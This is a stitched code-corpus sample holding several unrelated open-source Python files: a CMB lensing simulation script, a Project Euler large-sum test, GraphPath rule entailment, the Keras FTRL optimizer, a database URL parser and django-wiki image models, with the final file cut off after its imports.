parser.add_argument("-y", "--patch-height", type=float, default=15., help="Patch height in degrees.")
parser.add_argument("-o", "--yoffset", type=float, default=60., help="Offset in declination of southern patch center.")
parser.add_argument("-p", "--full-sky-pixel", type=float, default=0.5,help="Full sky pixel resolution in arcminutes.")
parser.add_argument("-i", "--pix-inter", type=float, default=None,help="Intermediate patch pixelization.")
parser.add_argument("-l", "--lmax", type=int, default=7000,help="Lmax for full-sky lensing.")
parser.add_argument("-b", "--bin-lmax", type=int, default=3000,help="Lmax for binning.")
parser.add_argument("-N", "--Nsims", type=int, default=10,help="Number of sims.")
parser.add_argument("-m", "--meanfield", type=str, default=None,help="Meanfield file root.")
parser.add_argument('-s', "--skip-recon",action='store_true',help="Skip reconstruction.")
args = parser.parse_args()
# Intialize the rotation testing pipeline
pipe = utils.RotTestPipeline(full_sky_pix=args.full_sky_pixel,wdeg=args.patch_width,
hdeg=args.patch_height,yoffset=args.yoffset,
mpi_comm=MPI.COMM_WORLD,nsims=args.Nsims,lmax=args.lmax,pix_intermediate=args.pix_inter,
bin_lmax=args.bin_lmax)
cmb = {} # this will store CMB maps
ikappa = {} # this will store input kappa maps
mlist = ['e','s','r'] # e stands for patch native to equator, s for native to south, r for rotated from south to equator
mf = {}
# Check if a meanfield is provided
for m in mlist:
if args.meanfield is not None:
mf[m] = enmap.read_map(args.meanfield+"/meanfield_"+m+".hdf")
else:
mf[m] = 0.
for k,index in enumerate(pipe.tasks):
# Make CMB maps and kappa maps
cmb['s'],cmb['e'],ikappa['s'],ikappa['e'] = pipe.make_sim(index)
# Rotate CMB map and kappa
cmb['r'] = pipe.rotator.rotate(cmb['s'])
ikappa['r'] = pipe.rotator.rotate(ikappa['s'], order=5, mode="constant", cval=0.0, prefilter=True, mask_nan=True, safe=True)
# For each of e,s,r
for m in mlist:
# Calculate CMB power
cxc,kcmb,kcmb = pipe.fc[m].power2d(cmb[m])
pipe.mpibox.add_to_stats("cmb-"+m,pipe.binner[m].bin(cxc/pipe.w2[m])[1]) # Divide by w2 window correction
# Calculate input kappa power
ixi,kinput,_ = pipe.fc[m].power2d(ikappa[m])
ixi /= pipe.w2[m] # divide by w2 window correction
pipe.mpibox.add_to_stats("ixi-"+m,pipe.binner[m].bin(ixi)[1])
if args.skip_recon: continue
if pipe.rank==0: pipe.logger.info( "Reconstructing...")
# Reconstruct and subtract meanfield if any
recon = pipe.reconstruct(m,cmb[m]) - mf[m]
if pipe.rank==0: pipe.logger.info( "Powers...")
# Calculate raw Clkk power
rxr,krecon,_ = pipe.fc[m].power2d(recon)
rxr /= pipe.w4[m]
# Calculate recon cross input power
rxi = pipe.fc[m].f2power(kinput,krecon)
rxi /= pipe.w3[m]
# Calculate realization dependent N0 ("super dumb")
n0 = pipe.qest[m].N.super_dumb_N0_TTTT(cxc)/pipe.w2[m]**2.
# Calculate corrected Clkk power
rxr_n0 = rxr - n0
# Collect statistics
pipe.mpibox.add_to_stack("meanfield-"+m,recon)
pipe.mpibox.add_to_stats("rxr-"+m,pipe.binner[m].bin(rxr)[1])
pipe.mpibox.add_to_stats("rxi-"+m,pipe.binner[m].bin(rxi)[1])
pipe.mpibox.add_to_stats("n0-"+m,pipe.binner[m].bin(n0)[1])
pipe.mpibox.add_to_stats("rxr-n0-"+m,pipe.binner[m].bin(rxr_n0)[1])
if k==0 and pipe.rank==0:
import orphics.io as io
io.plot_img(cmb[m],io.dout_dir+"cmb_"+m+".png",high_res=True)
io.plot_img(recon,io.dout_dir+"recon_"+m+".png",high_res=True)
if pipe.rank==0: pipe.logger.info( "MPI Collecting...")
pipe.mpibox.get_stacks(verbose=False)
pipe.mpibox.get_stats(verbose=False)
if pipe.rank==0:
pipe.dump(save_meanfield=(args.meanfield is None),skip_recon=args.skip_recon)
| bsd-2-clause | 4,958,113,471,433,312,000 | 41.252427 | 128 | 0.637638 | false |
doozr/euler.py | p0013_large_sum_test.py | 1 | 11957 | """
Work out the first ten digits of the sum of the following one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
Answer:
5537376230
"""
def large_sum(nums, n):
return str(sum(nums))[0:n]
def test_0013_large_sum():
digits = [37107287533902102798797998220837590246510135740250,
46376937677490009712648124896970078050417018260538,
74324986199524741059474233309513058123726617309629,
91942213363574161572522430563301811072406154908250,
23067588207539346171171980310421047513778063246676,
89261670696623633820136378418383684178734361726757,
28112879812849979408065481931592621691275889832738,
44274228917432520321923589422876796487670272189318,
47451445736001306439091167216856844588711603153276,
70386486105843025439939619828917593665686757934951,
62176457141856560629502157223196586755079324193331,
64906352462741904929101432445813822663347944758178,
92575867718337217661963751590579239728245598838407,
58203565325359399008402633568948830189458628227828,
80181199384826282014278194139940567587151170094390,
35398664372827112653829987240784473053190104293586,
86515506006295864861532075273371959191420517255829,
71693888707715466499115593487603532921714970056938,
54370070576826684624621495650076471787294438377604,
53282654108756828443191190634694037855217779295145,
36123272525000296071075082563815656710885258350721,
45876576172410976447339110607218265236877223636045,
17423706905851860660448207621209813287860733969412,
81142660418086830619328460811191061556940512689692,
51934325451728388641918047049293215058642563049483,
62467221648435076201727918039944693004732956340691,
15732444386908125794514089057706229429197107928209,
55037687525678773091862540744969844508330393682126,
18336384825330154686196124348767681297534375946515,
80386287592878490201521685554828717201219257766954,
78182833757993103614740356856449095527097864797581,
16726320100436897842553539920931837441497806860984,
48403098129077791799088218795327364475675590848030,
87086987551392711854517078544161852424320693150332,
59959406895756536782107074926966537676326235447210,
69793950679652694742597709739166693763042633987085,
41052684708299085211399427365734116182760315001271,
65378607361501080857009149939512557028198746004375,
35829035317434717326932123578154982629742552737307,
94953759765105305946966067683156574377167401875275,
88902802571733229619176668713819931811048770190271,
25267680276078003013678680992525463401061632866526,
36270218540497705585629946580636237993140746255962,
24074486908231174977792365466257246923322810917141,
91430288197103288597806669760892938638285025333403,
34413065578016127815921815005561868836468420090470,
23053081172816430487623791969842487255036638784583,
11487696932154902810424020138335124462181441773470,
63783299490636259666498587618221225225512486764533,
67720186971698544312419572409913959008952310058822,
95548255300263520781532296796249481641953868218774,
76085327132285723110424803456124867697064507995236,
37774242535411291684276865538926205024910326572967,
23701913275725675285653248258265463092207058596522,
29798860272258331913126375147341994889534765745501,
18495701454879288984856827726077713721403798879715,
38298203783031473527721580348144513491373226651381,
34829543829199918180278916522431027392251122869539,
40957953066405232632538044100059654939159879593635,
29746152185502371307642255121183693803580388584903,
41698116222072977186158236678424689157993532961922,
62467957194401269043877107275048102390895523597457,
23189706772547915061505504953922979530901129967519,
86188088225875314529584099251203829009407770775672,
11306739708304724483816533873502340845647058077308,
82959174767140363198008187129011875491310547126581,
97623331044818386269515456334926366572897563400500,
42846280183517070527831839425882145521227251250327,
55121603546981200581762165212827652751691296897789,
32238195734329339946437501907836945765883352399886,
75506164965184775180738168837861091527357929701337,
62177842752192623401942399639168044983993173312731,
32924185707147349566916674687634660915035914677504,
99518671430235219628894890102423325116913619626622,
73267460800591547471830798392868535206946944540724,
76841822524674417161514036427982273348055556214818,
97142617910342598647204516893989422179826088076852,
87783646182799346313767754307809363333018982642090,
10848802521674670883215120185883543223812876952786,
71329612474782464538636993009049310363619763878039,
62184073572399794223406235393808339651327408011116,
66627891981488087797941876876144230030984490851411,
60661826293682836764744779239180335110989069790714,
85786944089552990653640447425576083659976645795096,
66024396409905389607120198219976047599490197230297,
64913982680032973156037120041377903785566085089252,
16730939319872750275468906903707539413042652315011,
94809377245048795150954100921645863754710598436791,
78639167021187492431995700641917969777599028300699,
15368713711936614952811305876380278410754449733078,
40789923115535562561142322423255033685442488917353,
44889911501440648020369068063960672322193204149535,
41503128880339536053299340368006977710650566631954,
81234880673210146739058568557934581403627822703280,
82616570773948327592232845941706525094512325230608,
22918802058777319719839450180888072429661980811197,
77158542502016545090413245809786882778948721859617,
72107838435069186155435662884062257473692284509516,
20849603980134001723930671666823555245252804609722,
53503534226472524250874054075591789781264330331690]
assert large_sum(digits, 10) == "5537376230"
| gpl-3.0 | 8,063,223,558,314,383,000 | 54.356481 | 87 | 0.851133 | false |
gjhiggins/graphpath | graphpath/entail.py | 1 | 8355 | from __future__ import generators
from expr import Step, Class, Property
from util.anysets import Set, ImmutableSet
empty_set = ImmutableSet()
class RuleDict(dict):
"""A mapping of resources to GraphPath expressions.
The expression for a given resource is the Union()
of all the expressions assigned to that mapping.
"""
def __setitem__(self, res, expr):
"""Add a definition for a resource"""
if res in self:
extant = self[res]
if extant != expr:
dict.__setitem__(self, res, extant | expr)
else:
dict.__setitem__(self, res, expr)
class ClassRules(RuleDict, Step):
"""A dictionary of class definitions and, simultaneously,
the rule for rdf:type.
As a mapping, the key is a class resource and the value
is a GraphPath expression.
As a GraphPath step, match every implied rdf:type path.
"""
def values(self, pop, members):
"""It is very expensive to ask the rdf.type of a resource
under this rule evaluation system. For now, we defer to
the ground facts when asked a type."""
return empty_set
# full implementation disabled....
result = Set()
for clss in self:
if members & self[clss].initials(pop):
result.add(clss)
return result
def match(self, pop, classes):
"""Generate the extent set for a class or classes."""
result = Set()
for clss in classes:
if clss in self:
result |= self[clss].initials(pop)
return result
def __or__(self, other):
"""Prevent accidental modification
via redefinition or rdf:type."""
raise NotImplementedError
class PropertyRules(RuleDict):
"""A dictionary of property definitions.
The key is a property resource and the value is a
GraphPath expresion.
"""
class RuleBase:
"""A RuleBase is a mapping of classes and properties to their
definitions.
A class is indexed by an elementary Class(...)
step and its mapping is a definition in the form of
an absolute GraphPath expression.
A property is indexed by an elementary Property(...) step
and its mapping is a definition in the form of a relative
GraphPath expression.
Two attributes, self.classes and self.properties expose
the two rule populations individually.
"""
def __init__(self):
self.clear()
def clear(self):
"""Empty the rule base."""
self.classes = ClassRules()
self.properties = PropertyRules()
def __getstate__(self):
return self.properties, self.classes
def __setstate__(self, state):
self.properties, self.classes = state
def update(self, other):
"""Add all rules from another rulebase."""
for key in other:
self[key] = other[key]
def __setitem__(self, lvalue, expr):
"""Add a definition for a class or property.
Multiple definitions for the same class or property
are combined by union.
"""
if isinstance(lvalue, Class):
self.classes[lvalue.resource()] = expr
else:
assert isinstance(lvalue, Property)
self.properties[lvalue.resource()] = expr
def __getitem__(self, lvalue):
"""Map a class or property to its definition."""
if isinstance(lvalue, Class):
return self.classes[lvalue.resource()]
else:
assert isinstance(lvalue, Property)
return self.properties[lvalue.resource()]
def __contains__(self, lvalue):
"""Test if a class or property is defined."""
try:
__trial = self[lvalue]
del __trial
except KeyError:
return False
else:
return True
def __iter__(self):
"""Iterate all properties and classes in the rule base."""
for res in self.classes:
yield Class(res)
for res in self.properties:
if self.properties[res] is not self.classes:
yield Property(res)
def get(self, lvalue, default=None):
"""Map a class or property to its definition or None."""
try:
return self[lvalue]
except KeyError:
return default
class Sandbox:
"""A Sandbox is an environment for rule execution. It implements the
Population protocol and so can be queried with
expricit GraphPath expressions and implicitly by rules.
Rule dependencies a tracked, circular rules are iterated until stable,
and results are cached for the lifetime of the sandbox.
A sandbox requires the ground facts and rules to remain contant and there
must be only one thread executing in the sandbox.
Rules should be written so results depend only on information provided
by calling the sandbox methods. Rules must support the rule protocol
(see expr module) but need not be written using the expr module classes.
"""
def __init__(self, pop, rules):
"""Create a sandbox for the given facts and rules (both constant)."""
self._pop = pop
self._rules = rules
self._cache = {}
self._stack = []
self._circular = {}
# set the rdf:type rule for the local rdf:type symbol
self.rdf_type = pop.rdf_type
rules.properties[pop.rdf_type] = rules.classes
def match(self, prop, value):
"""Delegate the match function to a rule, if any,
otherwise return ground facts."""
if prop in self._rules.properties:
return self._evaluate(False, prop, value)
else:
return self._pop.match(prop, value)
def values(self, subj, prop):
"""Delegate the values function to a rule, if any,
otherwise return ground facts."""
if prop in self._rules.properties:
return self._evaluate(True, prop, subj)
else:
return self._pop.values(subj, prop)
def _evaluate(self, forward, prop, seed):
"""evaluate a rule for a property, prop,
in the direction, forward, with the argument, seed."""
pattern = forward, prop, seed # the present query as a tuple
stack = self._stack
circs = self._circular
cache = self._cache
# print " "*len(stack),pattern
# have we seen this query before?
if pattern in cache:
# is it a circular query (depends on its own result)?
if pattern in stack:
# register the query with its circular dependencies
depends = circs.setdefault(pattern, Set())
for ix in range(len(stack) - 1, -1, -1): # 2.2 syntax
depend = stack[ix]
if depend == pattern:
break
depends.add(depend)
# return previously obtained result
return cache[pattern]
# prepare to evaluate from scratch
seeds = Set([seed])
result = cache[pattern] = Set()
# get rule and ground facts
if forward:
rule = self._rules.properties[prop].values
result |= self._pop.values(seed, prop)
else:
rule = self._rules.properties[prop].match
result |= self._pop.match(prop, seed)
# maintain an evaluation stack to track circular dependencies
stack.append(pattern)
# attempt evaluation
result |= rule(self, seeds)
# if a circulation was detected we must iterate
if pattern in circs:
depends = circs[pattern]
while True:
init_count = len(result)
# invalidate cache for sub-queries that depend on result
for depend in depends:
del cache[depend]
result |= rule(self, seeds)
# if no new results were obtained we are finished
if len(result) == init_count:
break
# evaluation complete: cleanup stack
stack.pop()
return result
def __contains__(self, rid):
return rid in self._pop
def __iter__(self):
return iter(self._pop)
def __getitem__(self, rid):
return self._pop[rid]
| gpl-2.0 | -8,830,023,813,209,567,000 | 31.134615 | 77 | 0.59234 | false |
Intel-Corporation/tensorflow | tensorflow/python/keras/optimizer_v2/ftrl.py | 1 | 9853 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ftrl-proximal for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import training_ops
from tensorflow.python.util.tf_export import keras_export
@keras_export('keras.optimizers.Ftrl')
class Ftrl(optimizer_v2.OptimizerV2):
r"""Optimizer that implements the FTRL algorithm.
See Algorithm 1 of this [paper](
https://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf).
This version has support for both online L2 (the L2 penalty given in the paper
above) and shrinkage-type L2 (which is the addition of an L2 penalty to the
loss function).
Initialization:
$$t = 0$$
$$n_{0} = 0$$
$$\sigma_{0} = 0$$
$$z_{0} = 0$$
Update ($$i$$ is variable index):
$$t = t + 1$$
$$n_{t,i} = n_{t-1,i} + g_{t,i}^{2}$$
$$\sigma_{t,i} = (\sqrt{n_{t,i}} - \sqrt{n_{t-1,i}}) / \alpha$$
$$z_{t,i} = z_{t-1,i} + g_{t,i} - \sigma_{t,i} * w_{t,i}$$
$$w_{t,i} = - ((\beta+\sqrt{n+{t}}) / \alpha + \lambda_{2})^{-1} * (z_{i} -
sgn(z_{i}) * \lambda_{1}) if \abs{z_{i}} > \lambda_{i} else 0$$
Check the documentation for the l2_shrinkage_regularization_strength
parameter for more details when shrinkage is enabled, where gradient is
replaced with gradient_with_shrinkage.
"""
def __init__(self,
learning_rate,
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0,
name='Ftrl',
l2_shrinkage_regularization_strength=0.0,
**kwargs):
r"""Construct a new FTRL optimizer.
Args:
learning_rate: A float value or a constant float `Tensor`.
learning_rate_power: A float value, must be less or equal to zero.
Controls how the learning rate decreases during training. Use zero for
a fixed learning rate.
initial_accumulator_value: The starting value for accumulators.
Only zero or positive values are allowed.
l1_regularization_strength: A float value, must be greater than or
equal to zero.
l2_regularization_strength: A float value, must be greater than or
equal to zero.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "Ftrl".
l2_shrinkage_regularization_strength: A float value, must be greater than
or equal to zero. This differs from L2 above in that the L2 above is a
stabilization penalty, whereas this L2 shrinkage is a magnitude penalty.
The FTRL formulation can be written as:
w_{t+1} = argmin_w(\hat{g}_{1:t}w + L1*||w||_1 + L2*||w||_2^2), where
\hat{g} = g + (2*L2_shrinkage*w), and g is the gradient of the loss
function w.r.t. the weights w.
Specifically, in the absence of L1 regularization, it is equivalent to
the following update rule:
w_{t+1} = w_t - lr_t / (1 + 2*L2*lr_t) * g_t -
2*L2_shrinkage*lr_t / (1 + 2*L2*lr_t) * w_t
where lr_t is the learning rate at t.
When input is sparse shrinkage will only happen on the active weights.\
**kwargs: keyword arguments. Allowed to be {`clipnorm`, `clipvalue`, `lr`,
`decay`}. `clipnorm` is clip gradients by norm; `clipvalue` is clip
gradients by value, `decay` is included for backward compatibility to
allow time inverse decay of learning rate. `lr` is included for backward
compatibility, recommended to use `learning_rate` instead.
Raises:
ValueError: If one of the arguments is invalid.
References
See [paper]
(https://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf)
"""
super(Ftrl, self).__init__(name, **kwargs)
if initial_accumulator_value < 0.0:
raise ValueError(
'initial_accumulator_value %f needs to be positive or zero' %
initial_accumulator_value)
if learning_rate_power > 0.0:
raise ValueError('learning_rate_power %f needs to be negative or zero' %
learning_rate_power)
if l1_regularization_strength < 0.0:
raise ValueError(
'l1_regularization_strength %f needs to be positive or zero' %
l1_regularization_strength)
if l2_regularization_strength < 0.0:
raise ValueError(
'l2_regularization_strength %f needs to be positive or zero' %
l2_regularization_strength)
if l2_shrinkage_regularization_strength < 0.0:
raise ValueError(
'l2_shrinkage_regularization_strength %f needs to be positive'
' or zero' % l2_shrinkage_regularization_strength)
self._set_hyper('learning_rate', learning_rate)
self._set_hyper('decay', self._initial_decay)
self._set_hyper('learning_rate_power', learning_rate_power)
self._set_hyper('l1_regularization_strength', l1_regularization_strength)
self._set_hyper('l2_regularization_strength', l2_regularization_strength)
self._initial_accumulator_value = initial_accumulator_value
self._l2_shrinkage_regularization_strength = (
l2_shrinkage_regularization_strength)
def _create_slots(self, var_list):
# Create the "accum" and "linear" slots.
for var in var_list:
dtype = var.dtype.base_dtype
init = init_ops.constant_initializer(
self._initial_accumulator_value, dtype=dtype)
self.add_slot(var, 'accumulator', init)
self.add_slot(var, 'linear')
def _resource_apply_dense(self, grad, var):
var_dtype = var.dtype.base_dtype
lr_t = self._decayed_lr(var_dtype)
learning_rate_power = self._get_hyper('learning_rate_power', var_dtype)
l1_regularization_strength = self._get_hyper('l1_regularization_strength',
var_dtype)
l2_regularization_strength = self._get_hyper('l2_regularization_strength',
var_dtype)
accum = self.get_slot(var, 'accumulator')
linear = self.get_slot(var, 'linear')
if self._l2_shrinkage_regularization_strength <= 0.0:
return training_ops.resource_apply_ftrl(
var.handle,
accum.handle,
linear.handle,
grad,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
learning_rate_power,
use_locking=self._use_locking)
else:
return training_ops.resource_apply_ftrl_v2(
var.handle,
accum.handle,
linear.handle,
grad,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
math_ops.cast(self._l2_shrinkage_regularization_strength, var_dtype),
learning_rate_power,
use_locking=self._use_locking)
def _resource_apply_sparse(self, grad, var, indices):
var_dtype = var.dtype.base_dtype
lr_t = self._decayed_lr(var_dtype)
learning_rate_power = self._get_hyper('learning_rate_power', var_dtype)
l1_regularization_strength = self._get_hyper('l1_regularization_strength',
var_dtype)
l2_regularization_strength = self._get_hyper('l2_regularization_strength',
var_dtype)
accum = self.get_slot(var, 'accumulator')
linear = self.get_slot(var, 'linear')
if self._l2_shrinkage_regularization_strength <= 0.0:
return training_ops.resource_sparse_apply_ftrl(
var.handle,
accum.handle,
linear.handle,
grad,
indices,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
learning_rate_power,
use_locking=self._use_locking)
else:
return training_ops.resource_sparse_apply_ftrl_v2(
var.handle,
accum.handle,
linear.handle,
grad,
indices,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
math_ops.cast(self._l2_shrinkage_regularization_strength, var_dtype),
learning_rate_power,
use_locking=self._use_locking)
def get_config(self):
config = super(Ftrl, self).get_config()
config.update({
'learning_rate':
self._serialize_hyperparameter('learning_rate'),
'decay':
self._serialize_hyperparameter('decay'),
'initial_accumulator_value':
self._initial_accumulator_value,
'learning_rate_power':
self._serialize_hyperparameter('learning_rate_power'),
'l1_regularization_strength':
self._serializer_hyperparameter('l1_regularization_strength'),
'l2_regularization_strength':
self._serializer_hyperparameter('l2_regularization_strength'),
'l2_shrinkage_regularization_strength':
self._l2_shrinkage_regularization_strength,
})
return config
| apache-2.0 | -5,455,901,851,465,060,000 | 41.106838 | 80 | 0.628134 | false |
faeli/joke | joke/fair/db_url.py | 1 | 2442 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from urlparse import urlparse, parse_qsl
except ImportError as e:
from urllib.parse import urlparse, parse_qsl
from .database import SQLiteDatabase
schemes = {
'sqlite': SQLiteDatabase
}
def parseresult_to_dict(parsed):
# urlparse in python 2.6 is broken so query will be empty and instead
# appended to path complete with '?'
path_parts = parsed.path[1:].split('?')
try:
query = path_parts[1]
except IndexError:
query = parsed.query
connect_kwargs = {'database': path_parts[0]}
if parsed.username:
connect_kwargs['user'] = parsed.username
if parsed.password:
connect_kwargs['password'] = parsed.password
if parsed.hostname:
connect_kwargs['host'] = parsed.hostname
if parsed.port:
connect_kwargs['port'] = parsed.port
# Adjust parameters for MySQL.
if parsed.scheme == 'mysql' and 'password' in connect_kwargs:
connect_kwargs['passwd'] = connect_kwargs.pop('password')
elif 'sqlite' in parsed.scheme and not connect_kwargs['database']:
connect_kwargs['database'] = ':memory:'
# Get additional connection args from the query string
qs_args = parse_qsl(query, keep_blank_values=True)
for key, value in qs_args:
if value.lower() == 'false':
value = False
elif value.lower() == 'true':
value = True
elif value.isdigit():
value = int(value)
elif '.' in value and all(p.isdigit() for p in value.split('.', 1)):
try:
value = float(value)
except ValueError:
pass
elif value.lower() in ('null', 'none'):
value = None
connect_kwargs[key] = value
return connect_kwargs
def connect(db_url, **connect_params):
parsed = urlparse(db_url)
connect_kwargs = parseresult_to_dict(parsed)
connect_kwargs.update(connect_params)
database_class = schemes.get(parsed.scheme)
if database_class is None:
if database_class in schemes:
raise RuntimeError('Attempted to use "%s" but a required library '
'could not be imported.' % parsed.scheme)
else:
raise RuntimeError('Unrecognized or unsupported scheme: "%s".'%
parsed.scheme)
return database_class(**connect_kwargs)
# | mit | -5,027,614,411,988,602,000 | 29.5375 | 78 | 0.604013 | false |
a-nai/django-wiki | wiki/plugins/images/models.py | 1 | 5261 | from __future__ import unicode_literals
from __future__ import absolute_import
import os.path
from django.conf import settings as django_settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from . import settings
from wiki.models.pluginbase import RevisionPlugin, RevisionPluginRevision
from django.db.models import signals
from six.moves import range
if "sorl.thumbnail" not in django_settings.INSTALLED_APPS:
raise ImproperlyConfigured(
'wiki.plugins.images: needs sorl.thumbnail in INSTALLED_APPS')
def upload_path(instance, filename):
# Has to match original extension filename
upload_path = settings.IMAGE_PATH
upload_path = upload_path.replace(
'%aid', str(instance.plugin.image.article.id))
if settings.IMAGE_PATH_OBSCURIFY:
import uuid
upload_path = os.path.join(upload_path, uuid.uuid4().hex)
return os.path.join(upload_path, filename)
@python_2_unicode_compatible
class Image(RevisionPlugin):
# The plugin system is so awesome that the inheritor doesn't need to do
# anything! :D
def can_write(self, user):
if not settings.ANONYMOUS and (not user or user.is_anonymous()):
return False
return RevisionPlugin.can_write(self, user)
def can_delete(self, user):
return self.can_write(user)
class Meta:
verbose_name = _('image')
verbose_name_plural = _('images')
db_table = 'wiki_images_image' # Matches label of upcoming 0.1 release
if settings.APP_LABEL:
app_label = settings.APP_LABEL
def __str__(self):
title = (_('Image: %s') % self.current_revision.imagerevision.get_filename(
)) if self.current_revision else _('Current revision not set!!')
return str(title)
@python_2_unicode_compatible
class ImageRevision(RevisionPluginRevision):
image = models.ImageField(upload_to=upload_path,
max_length=2000, height_field='height',
width_field='width', blank=True, null=True,
storage=settings.STORAGE_BACKEND)
width = models.SmallIntegerField(blank=True, null=True)
height = models.SmallIntegerField(blank=True, null=True)
def get_filename(self):
if self.image:
try:
return self.image.name.split('/')[-1]
except OSError:
pass
return None
def path(self):
if self.image:
try:
#path1=self.image.path.split("/")[:-1]
path1=self.image.path[29:]
return path1
except OSError:
pass
return None
def dimensions(self):
return "{}x{}".format(self.width, self.height)
def get_size(self):
"""Used to retrieve the file size and not cause exceptions."""
try:
return self.image.size
except ValueError:
return None
except OSError:
return None
def inherit_predecessor(self, image, skip_image_file=False):
"""
Inherit certain properties from predecessor because it's very
convenient. Remember to always call this method before
setting properties :)"""
predecessor = image.current_revision.imagerevision
self.plugin = predecessor.plugin
self.deleted = predecessor.deleted
self.locked = predecessor.locked
if not skip_image_file:
try:
self.image = predecessor.image
self.width = predecessor.width
self.height = predecessor.height
except IOError:
self.image = None
class Meta:
verbose_name = _('image revision')
verbose_name_plural = _('image revisions')
# Matches label of upcoming 0.1 release
db_table = 'wiki_images_imagerevision'
if settings.APP_LABEL:
app_label = settings.APP_LABEL
ordering = ('-created',)
def __str__(self):
title = _('Image Revsion: %d') % self.revision_number
return str(title)
def on_image_revision_delete(instance, *args, **kwargs):
if not instance.image:
return
# Remove image file
path = instance.image.path.split("/")[:-1]
instance.image.delete(save=False)
# Clean up empty directories
# Check for empty folders in the path. Delete the first two.
if len(path[-1]) == 32:
# Path was (most likely) obscurified so we should look 2 levels down
max_depth = 2
else:
max_depth = 1
for depth in range(0, max_depth):
delete_path = "/".join(path[:-depth] if depth > 0 else path)
try:
dir_list = os.listdir(
os.path.join(django_settings.MEDIA_ROOT, delete_path))
except OSError:
# Path does not exist, so let's not try to remove it...
dir_list = None
if not (dir_list is None) and len(dir_list) == 0:
os.rmdir(delete_path)
signals.pre_delete.connect(on_image_revision_delete, ImageRevision)
| gpl-3.0 | -3,529,403,965,202,404,400 | 32.08805 | 83 | 0.617943 | false |
fulfilio/trytond-gift-card | product.py | 1 | 3978 | # -*- coding: utf-8 -*-
from trytond.model import fields, ModelSQL, ModelView
from trytond.pool import PoolMeta
